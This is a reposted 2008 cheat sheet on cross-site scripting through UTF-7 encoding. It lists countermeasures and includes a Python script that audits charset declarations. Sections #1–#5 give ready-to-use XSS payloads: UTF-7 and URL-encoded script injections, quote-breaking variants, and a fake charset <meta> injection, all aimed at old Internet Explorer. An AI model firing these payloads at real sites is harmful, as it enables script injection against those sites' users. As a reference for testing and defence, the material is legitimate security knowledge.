UTF-7 XSS Cheat Sheet

2010-02-20 15:44:11 Author: root

http://openmya.hacker.jp/hasegawa/security/utf7cs.html

#0 Countermeasures

Countermeasures against XSS with UTF-7 are:
  • Specify the charset explicitly (the HTTP header is recommended)
  • Don't place text an attacker can control before the <meta> charset declaration
  • Specify a charset name that the browser recognizes
For more information about the UTF-7 trick, see "Cross-site scripting with UTF-7".
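
A check for the three countermeasures above, run against one HTTP response. This is an added example, not part of the original cheat sheet; `audit_charset` and the `ALLOWED_CHARSETS` allowlist are hypothetical names, and the allowlist contents are an assumption to adapt per site.

```python
import re

# Assumption: charset names this site serves and its target browsers recognize.
ALLOWED_CHARSETS = {"utf-8", "shift_jis", "euc-jp", "iso-8859-1", "windows-1252"}

CHARSET_RE = re.compile(r"charset\s*=\s*[\"']?([^\s;\"'>]+)", re.I)
META_RE = re.compile(r"<meta\b[^>]*\bcharset\b[^>]*>", re.I)
TITLE_RE = re.compile(r"<title\b", re.I)


def audit_charset(content_type, body):
    """Return a list of findings for one HTML response; an empty list passes."""
    findings = []
    header = CHARSET_RE.search(content_type or "")
    header_ok = header is not None and header.group(1).lower() in ALLOWED_CHARSETS
    meta = META_RE.search(body)
    meta_name = CHARSET_RE.search(meta.group(0)) if meta else None
    title = TITLE_RE.search(body)

    # Countermeasure 1: charset stated explicitly, preferably in the HTTP header.
    if header is None:
        findings.append("header: no charset in Content-Type")
        if meta is None:
            findings.append("meta: no charset declared anywhere")

    # Countermeasure 2: no attacker-influenced text before the <meta>.
    # Checked only when the header does not already fix the encoding.
    if not header_ok and meta and title and title.start() < meta.start():
        findings.append("order: <title> precedes the charset <meta>")

    # Countermeasure 3: every declared name must be one the browser recognizes.
    for where, match in (("header", header), ("meta", meta_name)):
        if match and match.group(1).lower() not in ALLOWED_CHARSETS:
            findings.append(f"{where}: unrecognized charset {match.group(1)!r}")
    return findings


if __name__ == "__main__":
    # Constructed sample: user-controlled title placed before the <meta>.
    page = '<title>USER TEXT</title>\n<meta http-equiv="content-type" content="text/html; charset=utf-8">'
    print(audit_charset("text/html", page))
```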

#1 Most basic pattern

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
<script>alert(document.location)</script>
Most basic XSS pattern with UTF-7.

#2 URL encoded most basic pattern

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
<script>alert(document.location)</script>
URL-encoded form of the above.
Example: http://example.com/search?q=%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

#3 With quote

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
"><script>alert(document.location)</script><"
 

#4 URL encoded, with quote

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
"><script>alert(document.location)</script><"
URL-encoded form of the above.
Example: http://example.com/search?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

#5 Inject fake <meta>

+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
Inject a fake <meta> before the original <meta> to force the browser to interpret the page as UTF-7.
<title>
+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

These XSS patterns are tested on IE6 and IE7.
Yosuke HASEGAWA <hasegawa@openmya.hacker.jp>
Last modified: 2008-01-11 